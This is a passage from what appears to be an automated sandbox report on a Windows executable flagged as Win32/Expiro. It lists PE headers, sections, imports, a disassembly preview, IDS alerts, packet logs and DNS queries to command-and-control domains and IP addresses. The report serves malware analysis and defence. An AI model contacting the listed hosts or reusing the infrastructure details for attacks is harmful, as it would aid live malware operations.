                                        Subsystem Version Minor:1
                                        Import Hash:afcdf79be1557326c854b6e20cb900a7

                                        Entrypoint Preview

                                        Instruction
                                        call 00007FEAE04BA12Ah
                                        jmp 00007FEAE04ACEF4h
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        int3
                                        push edi
                                        push esi
                                        mov esi, dword ptr [esp+10h]
                                        mov ecx, dword ptr [esp+14h]
                                        mov edi, dword ptr [esp+0Ch]
                                        mov eax, ecx
                                        mov edx, ecx
                                        add eax, esi
                                        cmp edi, esi
                                        jbe 00007FEAE04AD07Ah
                                        cmp edi, eax
                                        jc 00007FEAE04AD3DEh
                                        bt dword ptr [004C31FCh], 01h
                                        jnc 00007FEAE04AD079h
                                        rep movsb
                                        jmp 00007FEAE04AD38Ch
                                        cmp ecx, 00000080h
                                        jc 00007FEAE04AD244h
                                        mov eax, edi
                                        xor eax, esi
                                        test eax, 0000000Fh
                                        jne 00007FEAE04AD080h
                                        bt dword ptr [004BE324h], 01h
                                        jc 00007FEAE04AD550h
                                        bt dword ptr [004C31FCh], 00000000h
                                        jnc 00007FEAE04AD21Dh
                                        test edi, 00000003h
                                        jne 00007FEAE04AD22Eh
                                        test esi, 00000003h
                                        jne 00007FEAE04AD20Dh
                                        bt edi, 02h
                                        jnc 00007FEAE04AD07Fh
                                        mov eax, dword ptr [esi]
                                        sub ecx, 04h
                                        lea esi, dword ptr [esi+04h]
                                        mov dword ptr [edi], eax
                                        lea edi, dword ptr [edi+04h]
                                        bt edi, 03h
                                        jnc 00007FEAE04AD083h
                                        movq xmm1, qword ptr [esi]
                                        sub ecx, 08h
                                        lea esi, dword ptr [esi+08h]
                                        movq qword ptr [edi], xmm1
                                        lea edi, dword ptr [edi+08h]
                                        test esi, 00000007h
                                        je 00007FEAE04AD0D5h
                                        bt esi, 03h
                                        jnc 00007FEAE04AD128h

                                        Rich Headers

                                        Programming Language:
                                        • [ASM] VS2013 build 21005
                                        • [ C ] VS2013 build 21005
                                        • [C++] VS2013 build 21005
                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ASM] VS2013 UPD4 build 31101
                                        • [RES] VS2013 build 21005
                                        • [LNK] VS2013 UPD4 build 31101

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xba44c0x17c.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc70000x5ea70.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa48700x40.rdata
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x8dcc40x8de0092f37553257a68bb6536aef5e2e09646False0.5728679102422908data6.676135952415752IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x8f0000x2e10e0x2e20079b14b254506b0dbc8cd0ad67fb70ad9False0.33535526761517614OpenPGP Public Key5.76010872795207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xbe0000x8f740x52009f9d6f746f1a415a63de45f8b7983d33False0.1017530487804878data1.198745897703538IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0xc70000x5ea700x5ec009bc3f951ef6beca7d3c742c556a151b1False0.930285290237467data7.900479406416309IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x1260000x960000x950008beb6b09b7e0bc4c658b4b345fa05ff2False0.975751428796141data7.938066838476511IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                        RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                        RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                        RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                        RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                        RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                        RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                        RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                        RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                        RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                        RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                        RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                        RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                        RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                        RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                        RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                        RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                        RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                        RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                        RT_RCDATA0xcf7b80x55d37data1.0003299738581055
                                        RT_GROUP_ICON0x1254f00x76dataEnglishGreat Britain0.6610169491525424
                                        RT_GROUP_ICON0x1255680x14dataEnglishGreat Britain1.25
                                        RT_GROUP_ICON0x12557c0x14dataEnglishGreat Britain1.15
                                        RT_GROUP_ICON0x1255900x14dataEnglishGreat Britain1.25
                                        RT_VERSION0x1255a40xdcdataEnglishGreat Britain0.6181818181818182
                                        RT_MANIFEST0x1256800x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                        Imports

                                        DLLImport
                                        WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                        VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                        COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                        WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                        PSAPI.DLLGetProcessMemoryInfo
                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                        USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                        UxTheme.dllIsThemeActive
                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                        USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishGreat Britain

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-12-13T08:57:47.022692+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.74970154.244.188.17780TCP
                                        2024-12-13T08:57:47.143286+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.749701TCP
                                        2024-12-13T08:57:47.143286+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.749701TCP
                                        2024-12-13T08:57:53.707129+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.7529451.1.1.153UDP
                                        2024-12-13T08:57:53.777240+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.749711TCP
                                        2024-12-13T08:57:53.777240+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.749711TCP
                                        2024-12-13T08:58:02.451238+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7647161.1.1.153UDP
                                        2024-12-13T08:58:05.616265+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.749738TCP
                                        2024-12-13T08:58:05.616265+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.749738TCP
                                        2024-12-13T08:58:50.913385+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.74979582.112.184.19780TCP
                                        2024-12-13T08:59:39.008398+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.749950TCP
                                        2024-12-13T08:59:39.008398+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.749950TCP
                                        2024-12-13T08:59:41.942002+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.749960TCP
                                        2024-12-13T08:59:41.942002+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.749960TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 13, 2024 08:57:43.406486988 CET4970080192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:43.527578115 CET804970054.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:43.527659893 CET4970080192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:43.585007906 CET4970080192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:43.585007906 CET4970080192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:43.706017017 CET804970054.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:43.706033945 CET804970054.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:44.886413097 CET804970054.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:44.886459112 CET804970054.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:44.886548996 CET4970080192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:44.942709923 CET4970080192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:45.062495947 CET804970054.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:45.548350096 CET4970180192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:45.668101072 CET804970154.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:45.668188095 CET4970180192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:45.668587923 CET4970180192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:45.668606997 CET4970180192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:45.788244009 CET804970154.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:45.788278103 CET804970154.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:46.283036947 CET4970280192.168.2.718.141.10.107
                                        Dec 13, 2024 08:57:46.402852058 CET804970218.141.10.107192.168.2.7
                                        Dec 13, 2024 08:57:46.402971983 CET4970280192.168.2.718.141.10.107
                                        Dec 13, 2024 08:57:46.403182983 CET4970280192.168.2.718.141.10.107
                                        Dec 13, 2024 08:57:46.403234005 CET4970280192.168.2.718.141.10.107
                                        Dec 13, 2024 08:57:46.522973061 CET804970218.141.10.107192.168.2.7
                                        Dec 13, 2024 08:57:46.523000956 CET804970218.141.10.107192.168.2.7
                                        Dec 13, 2024 08:57:47.022608042 CET804970154.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:47.022629023 CET804970154.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:47.022691965 CET4970180192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:47.023606062 CET4970180192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:47.143285990 CET804970154.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:47.254192114 CET4970380192.168.2.718.141.10.107
                                        Dec 13, 2024 08:57:47.373958111 CET804970318.141.10.107192.168.2.7
                                        Dec 13, 2024 08:57:47.374044895 CET4970380192.168.2.718.141.10.107
                                        Dec 13, 2024 08:57:47.382857084 CET4970380192.168.2.718.141.10.107
                                        Dec 13, 2024 08:57:47.382895947 CET4970380192.168.2.718.141.10.107
                                        Dec 13, 2024 08:57:47.505276918 CET804970318.141.10.107192.168.2.7
                                        Dec 13, 2024 08:57:47.505335093 CET804970318.141.10.107192.168.2.7
                                        Dec 13, 2024 08:57:48.450704098 CET804970218.141.10.107192.168.2.7
                                        Dec 13, 2024 08:57:48.451261997 CET804970218.141.10.107192.168.2.7
                                        Dec 13, 2024 08:57:48.454502106 CET4970280192.168.2.718.141.10.107
                                        Dec 13, 2024 08:57:48.601692915 CET4970280192.168.2.718.141.10.107
                                        Dec 13, 2024 08:57:48.721462965 CET804970218.141.10.107192.168.2.7
                                        Dec 13, 2024 08:57:49.917896032 CET804970318.141.10.107192.168.2.7
                                        Dec 13, 2024 08:57:49.917917967 CET804970318.141.10.107192.168.2.7
                                        Dec 13, 2024 08:57:49.918005943 CET4970380192.168.2.718.141.10.107
                                        Dec 13, 2024 08:57:49.918189049 CET4970380192.168.2.718.141.10.107
                                        Dec 13, 2024 08:57:50.039861917 CET804970318.141.10.107192.168.2.7
                                        Dec 13, 2024 08:57:50.327353954 CET4970580192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:50.447211027 CET804970554.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:50.447340965 CET4970580192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:50.470268011 CET4970580192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:50.470310926 CET4970580192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:50.590100050 CET804970554.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:50.590183020 CET804970554.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:51.801510096 CET804970554.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:51.801857948 CET804970554.244.188.177192.168.2.7
                                        Dec 13, 2024 08:57:51.801915884 CET4970580192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:51.831271887 CET4970580192.168.2.754.244.188.177
                                        Dec 13, 2024 08:57:51.951178074 CET804970554.244.188.177192.168.2.7
                                        Dec 13, 2024 08:58:03.303308010 CET4973880192.168.2.718.141.10.107
                                        Dec 13, 2024 08:58:03.423172951 CET804973818.141.10.107192.168.2.7
                                        Dec 13, 2024 08:58:03.423280001 CET4973880192.168.2.718.141.10.107
                                        Dec 13, 2024 08:58:03.445158958 CET4973880192.168.2.718.141.10.107
                                        Dec 13, 2024 08:58:03.445158958 CET4973880192.168.2.718.141.10.107
                                        Dec 13, 2024 08:58:03.568073034 CET804973818.141.10.107192.168.2.7
                                        Dec 13, 2024 08:58:03.568136930 CET804973818.141.10.107192.168.2.7
                                        Dec 13, 2024 08:58:05.495245934 CET804973818.141.10.107192.168.2.7
                                        Dec 13, 2024 08:58:05.495414972 CET804973818.141.10.107192.168.2.7
                                        Dec 13, 2024 08:58:05.495471954 CET4973880192.168.2.718.141.10.107
                                        Dec 13, 2024 08:58:05.495598078 CET4973880192.168.2.718.141.10.107
                                        Dec 13, 2024 08:58:05.616265059 CET804973818.141.10.107192.168.2.7
                                        Dec 13, 2024 08:59:45.651549101 CET4997380192.168.2.718.141.10.107
                                        Dec 13, 2024 08:59:45.773133039 CET804997318.141.10.107192.168.2.7
                                        Dec 13, 2024 08:59:45.773458958 CET4997380192.168.2.718.141.10.107
                                        Dec 13, 2024 08:59:45.773694038 CET4997380192.168.2.718.141.10.107
                                        Dec 13, 2024 08:59:45.773741007 CET4997380192.168.2.718.141.10.107
                                        Dec 13, 2024 08:59:45.897615910 CET804997318.141.10.107192.168.2.7
                                        Dec 13, 2024 08:59:45.897694111 CET804997318.141.10.107192.168.2.7
                                        Dec 13, 2024 08:59:47.833221912 CET804997318.141.10.107192.168.2.7
                                        Dec 13, 2024 08:59:47.833245039 CET804997318.141.10.107192.168.2.7
                                        Dec 13, 2024 08:59:47.833405018 CET4997380192.168.2.718.141.10.107
                                        Dec 13, 2024 08:59:47.833405972 CET4997380192.168.2.718.141.10.107
                                        Dec 13, 2024 08:59:47.958336115 CET804997318.141.10.107192.168.2.7

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Dec 13, 2024 08:57:41.295751095 CET5811753192.168.2.71.1.1.1
                                        Dec 13, 2024 08:57:42.041624069 CET53581171.1.1.1192.168.2.7
                                        Dec 13, 2024 08:57:45.184712887 CET5854053192.168.2.71.1.1.1
                                        Dec 13, 2024 08:57:45.324726105 CET53585401.1.1.1192.168.2.7
                                        Dec 13, 2024 08:57:45.630405903 CET5232553192.168.2.71.1.1.1
                                        Dec 13, 2024 08:57:46.168780088 CET53523251.1.1.1192.168.2.7
                                        Dec 13, 2024 08:57:47.080204964 CET6108453192.168.2.71.1.1.1
                                        Dec 13, 2024 08:57:47.218055010 CET53610841.1.1.1192.168.2.7
                                        Dec 13, 2024 08:57:48.622184038 CET5032753192.168.2.71.1.1.1
                                        Dec 13, 2024 08:57:49.185622931 CET53503271.1.1.1192.168.2.7
                                        Dec 13, 2024 08:57:49.977952957 CET5443653192.168.2.71.1.1.1
                                        Dec 13, 2024 08:57:50.117605925 CET53544361.1.1.1192.168.2.7
                                        Dec 13, 2024 08:58:02.450383902 CET53613001.1.1.1192.168.2.7
                                        Dec 13, 2024 08:58:05.747647047 CET53528531.1.1.1192.168.2.7
                                        Dec 13, 2024 08:58:05.980045080 CET53652131.1.1.1192.168.2.7
                                        Dec 13, 2024 08:59:47.834794044 CET6154853192.168.2.71.1.1.1
                                        Dec 13, 2024 08:59:48.431207895 CET53615481.1.1.1192.168.2.7

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Dec 13, 2024 08:57:41.295751095 CET192.168.2.71.1.1.10x4dd5Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:57:45.184712887 CET192.168.2.71.1.1.10x95c3Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:57:45.630405903 CET192.168.2.71.1.1.10x9394Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:57:47.080204964 CET192.168.2.71.1.1.10xd80aStandard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:57:48.622184038 CET192.168.2.71.1.1.10xe6e0Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:57:49.977952957 CET192.168.2.71.1.1.10x95f2Standard query (0)cvgrf.bizA (IP address)IN (0x0001)false
                                        Dec 13, 2024 08:59:47.834794044 CET192.168.2.71.1.1.10x841aStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false

                                        DNS Answers

